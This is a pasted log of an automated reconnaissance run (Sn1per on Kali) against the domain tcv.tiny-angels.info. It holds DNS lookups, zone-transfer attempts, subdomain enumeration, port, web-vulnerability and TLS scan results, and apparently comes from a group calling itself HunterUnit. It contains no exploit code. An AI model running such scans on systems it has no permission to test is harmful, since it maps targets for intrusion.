- ns1.parkingcrew.net. 60 IN A 54.75.227.14
- ns1.parkingcrew.net. 60 IN A 52.64.97.236
- ns1.parkingcrew.net. 60 IN A 52.2.199.197
- ns1.parkingcrew.net. 60 IN A 52.68.87.177
- Mail (MX) Servers:
- ___________________
- mail.h-email.net. 300 IN A 198.133.159.135
- mail.h-email.net. 300 IN A 198.133.159.139
- mail.h-email.net. 300 IN A 198.133.159.120
- mail.h-email.net. 300 IN A 198.133.159.126
- mail.h-email.net. 300 IN A 198.133.159.138
- mail.h-email.net. 300 IN A 198.133.159.133
- mail.h-email.net. 300 IN A 198.133.159.137
- mail.h-email.net. 300 IN A 198.133.159.121
- mail.h-email.net. 300 IN A 198.133.159.123
- mail.h-email.net. 300 IN A 198.133.159.119
- mail.h-email.net. 300 IN A 198.133.159.124
- mail.h-email.net. 300 IN A 198.133.159.132
- mail.h-email.net. 300 IN A 198.133.159.136
- mail.h-email.net. 300 IN A 198.133.159.125
- mail.h-email.net. 300 IN A 198.133.159.122
- mail.h-email.net. 300 IN A 198.133.159.134
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for tcv.tiny-angels.info on ns2.parkingcrew.net ...
- AXFR record query failed: corrupt packet
- Trying Zone Transfer for tcv.tiny-angels.info on ns1.parkingcrew.net ...
- AXFR record query failed: corrupt packet
- brute force file not specified, bay.
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for tcv.tiny-angels.info
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-tcv.tiny-angels.info-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING tcv.tiny-angels.info (185.53.179.6) 56(84) bytes of data.
- 64 bytes from 185.53.179.6 (185.53.179.6): icmp_seq=1 ttl=52 time=128 ms
- --- tcv.tiny-angels.info ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 128.276/128.276/128.276/0.000 ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 20:52 EDT
- Nmap scan report for tcv.tiny-angels.info (185.53.179.6)
- Host is up (0.13s latency).
- Not shown: 471 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://tcv.tiny-angels.info
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://tcv.tiny-angels.info [200 OK] Frame, HTTPServer[nginx], IP[185.53.179.6], Script, Title[tiny-angels.info], UncommonHeaders[x-check,x-language,x-template], nginx
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: tcv.tiny-angels.info:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: nginx
- Date: Sat, 30 Sep 2017 00:52:16 GMT
- Content-Type: text/html
- Content-Length: 166
- Connection: close
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- HTTP/1.1 403 Forbidden
- Server: nginx
- Date: Sat, 30 Sep 2017 00:52:17 GMT
- Content-Type: text/html
- Content-Length: 162
- Connection: keep-alive
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on tcv.tiny-angels.info...
- + -- --=[Checking if X-Frame options are enabled on tcv.tiny-angels.info...
- + -- --=[Checking if X-XSS-Protection header is enabled on tcv.tiny-angels.info...
- + -- --=[Checking HTTP methods on tcv.tiny-angels.info...
- + -- --=[Checking if TRACE method is enabled on tcv.tiny-angels.info...
- + -- --=[Checking for META tags on tcv.tiny-angels.info...
- + -- --=[Checking for open proxy on tcv.tiny-angels.info...
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Enumerating software on tcv.tiny-angels.info...
- Server: nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on tcv.tiny-angels.info...
- + -- --=[Checking for Flash cross-domain policy on tcv.tiny-angels.info...
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for Silverlight cross-domain policy on tcv.tiny-angels.info...
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on tcv.tiny-angels.info...
- + -- --=[Retrieving robots.txt on tcv.tiny-angels.info...
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Retrieving sitemap.xml on tcv.tiny-angels.info...
- <html>
- <head><title>403 Forbidden</title></head>
- <body bgcolor="white">
- <center><h1>403 Forbidden</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- + -- --=[Checking cookie attributes on tcv.tiny-angels.info...
- + -- --=[Checking for ASP.NET Detailed Errors on tcv.tiny-angels.info...
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 185.53.179.6
- + Target Hostname: tcv.tiny-angels.info
- + Target Port: 80
- + Start Time: 2017-09-29 20:53:00 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-template' found, with contents: tpl_CleanPeppermintBlack_oneclick
- + Uncommon header 'x-language' found, with contents: english
- + Uncommon header 'x-check' found, with contents: 3c12dc4d54f8e22d666785b733b0052100c53444
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'x-blocked' found, with contents: 11015.10
- + Uncommon header 'x-error' found, with contents: domain unknown
- + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x57df9bb5 0x0
- + OSVDB-3092: /css: This might be interesting...
- + 8315 requests: 0 error(s) and 10 item(s) reported on remote host
- + End Time: 2017-09-29 21:29:56 (GMT-4) (2216 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tcv.tiny-angels.info-port80.jpg
- load glyph failed err=6 face=0x55adb321ef20, glyph=2798
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.22-3 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [29-09-2017 21:30:46]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-tcv.tiny-angels.info.txt ]
- [ INFO ][ DORK ]::[ site:tcv.tiny-angels.info ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ls ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.me ID: 012347377894689429761:wgkj5jn9ee4 ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [29-09-2017 21:30:56]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-tcv.tiny-angels.info.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://tcv.tiny-angels.info
- ERROR:root:Site https://tcv.tiny-angels.info appears to be down
- + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
- ____ _ _ _____ _ _
- / ___| | ___ _ _ __| | ___|_ _(_) |
- | | | |/ _ \| | | |/ _` | |_ / _` | | |
- | |___| | (_) | |_| | (_| | _| (_| | | |
- \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
- v1.0.1 by m0rtem
- [21:30:59] Initializing CloudFail - the date is: 29/09/2017
- [21:30:59] Fetching initial information from: tcv.tiny-angels.info...
- [21:30:59] Server IP: 185.53.179.6
- [21:30:59] Testing if tcv.tiny-angels.info is on the Cloudflare network...
- [21:30:59] tcv.tiny-angels.info is not part of the Cloudflare network, quitting...
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- https://tcv.tiny-angels.info [302 Found] IP[185.53.179.6], RedirectLocation[http://tcv.tiny-angels.info?_xas=4ac4fcfeef66ff68682ca4e00d43be1a5731ae7d]
- http://tcv.tiny-angels.info?_xas=4ac4fcfeef66ff68682ca4e00d43be1a5731ae7d [200 OK] Frame, HTTPServer[nginx], IP[185.53.179.6], Script, Title[tiny-angels.info], UncommonHeaders[x-check,x-language,x-template], nginx
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- tcv.tiny-angels.info:443 => 185.53.179.6:443
- SCAN RESULTS FOR TCV.TINY-ANGELS.INFO:443 - 185.53.179.6:443
- ------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- Unhandled exception when processing --certinfo:
- utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
- * Session Resumption:
- With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
- ERROR #1: SSLHandshakeRejected - TCP / Received RST
- ERROR #2: SSLHandshakeRejected - TCP / Received RST
- ERROR #3: SSLHandshakeRejected - TCP / Received RST
- ERROR #4: SSLHandshakeRejected - TCP / Received RST
- ERROR #5: SSLHandshakeRejected - TCP / Received RST
- With TLS Session Tickets: ERROR: SSLHandshakeRejected - TCP / Received RST
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 5.80 S
- ------------------------
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server tcv.tiny-angels.info on port 443 using SNI name tcv.tiny-angels.info
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-521 DHE 521
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-521 DHE 521
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: www.parkingcrew.com
- Altnames: DNS:www.parkingcrew.com
- Issuer: thawte DV SSL CA - G2
- Not valid before: Nov 24 00:00:00 2014 GMT
- Not valid after: Jul 1 23:59:59 2017 GMT
- #######################################################################################################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- ######################################################################################################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Start 2017-09-29 21:31:13 -->> 185.53.179.6:443 (tcv.tiny-angels.info) <<--
- rDNS (185.53.179.6): --
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 not offered
- TLS 1.1 not offered
- TLS 1.2 offered (OK)
- SPDY/NPN http/1.1 (advertised)
- HTTP2/ALPN http/1.1 (offered)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA
- Elliptic curves offered: prime256v1 secp384r1 secp521r1
- Testing server preferences
- Has server cipher order? yes (OK)
- Negotiated protocol TLSv1.2
- Negotiated cipher ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Cipher order
- TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA
- Testing server defaults (Server Hello)
- TLS extensions (standard) "next protocol/#13172" "session ticket/#35"
- "renegotiation info/#65281"
- "application layer protocol negotiation/#16"
- Session Ticket RFC 5077 hint (no lifetime advertised)
- SSL Session ID support yes
- Session Resumption Tickets: yes, ID: no
- TLS clock skew Random values, no fingerprinting possible
- Signature Algorithm SHA256 with RSA
- Server key size RSA 2048 bits
- Fingerprint / Serial SHA1 CB4AE9E24BAB714BB0C2C707DA78D74E43B2B10A / 55F2EBB7F44E0B5AC0125A5D14E72035
- SHA256 125A602BA5E0ECF0A647882BF62CBB284188DC7330208AC8804A41634563A37B
- Common Name (CN) www.parkingcrew.com
- subjectAltName (SAN) www.parkingcrew.com
- Issuer thawte DV SSL CA - G2 (thawte, Inc. from US)
- Trust (hostname) certificate does not match supplied URI (same w/o SNI)
- Chain of trust NOT ok (expired)
- EV cert (experimental) no
- Certificate Expiration expired! (2014-11-23 19:00 --> 2017-07-01 19:59 -0400)
- # of certificates provided 3
- Certificate Revocation List http://tn.symcb.com/tn.crl
- OCSP URI http://tn.symcd.com
- OCSP stapling --
- OCSP must staple no
- DNS CAA RR (experimental) --
- Certificate Transparency no
- Testing HTTP header response @ "/"
- HTTP Status Code 302 Found, redirecting to "http://tcv.tiny-angels.info?_xas=4ac4fcfeef66ff68682ca4e00d43be1a5731ae7d" -- Redirect to insecure URL (NOT ok)
- HTTP clock skew 0 sec from localtime
- Strict Transport Security --
- Public Key Pinning --
- Server banner (no "Server" line in header, interesting!)
- Application banner --
- Cookie(s) (none issued at "/") -- maybe better try target URL of 30x
- Security headers --
- Reverse Proxy banner --
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
- Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
- BREACH (CVE-2013-3587) no HTTP compression (OK) - only supplied "/" tested
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) No fallback possible, TLS 1.2 is the only protocol (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
- make sure you don't use this certificate elsewhere with SSLv2 enabled services
- https://censys.io/ipv4?q=125A602BA5E0ECF0A647882BF62CBB284188DC7330208AC8804A41634563A37B could help you to find out
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) no SSL3 or TLS1 (OK)
- LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 521 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
- xc014 ECDHE-RSA-AES256-SHA ECDH 521 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
- Running client simulations via sockets
- Android 2.3.7 No connection
- Android 4.1.1 No connection
- Android 4.3 No connection
- Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Android 5.0.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 521 bit ECDH (P-521)
- Android 6.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 384 bit ECDH (P-384)
- Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- IE 6 XP No connection
- IE 7 Vista No connection
- IE 8 XP No connection
- IE 8 Win 7 No connection
- IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, 384 bit ECDH (P-384)
- IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES256-SHA, 384 bit ECDH (P-384)
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES256-SHA, 384 bit ECDH (P-384)
- IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 384 bit ECDH (P-384)
- Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, 521 bit ECDH (P-521)
- Safari 5.1.9 OS X 10.6.8 No connection
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA, 521 bit ECDH (P-521)
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Tor 17.0.9 Win 7 No connection
- Java 6u45 No connection
- Java 7u25 No connection
- Java 8u31 No connection
- OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 521 bit ECDH (P-521)
- Done 2017-09-29 21:33:53 [ 161s] -->> 185.53.179.6:443 (tcv.tiny-angels.info) <<--
- ############################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
- HunterUnit JTSEC full Recon Anonymous #1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement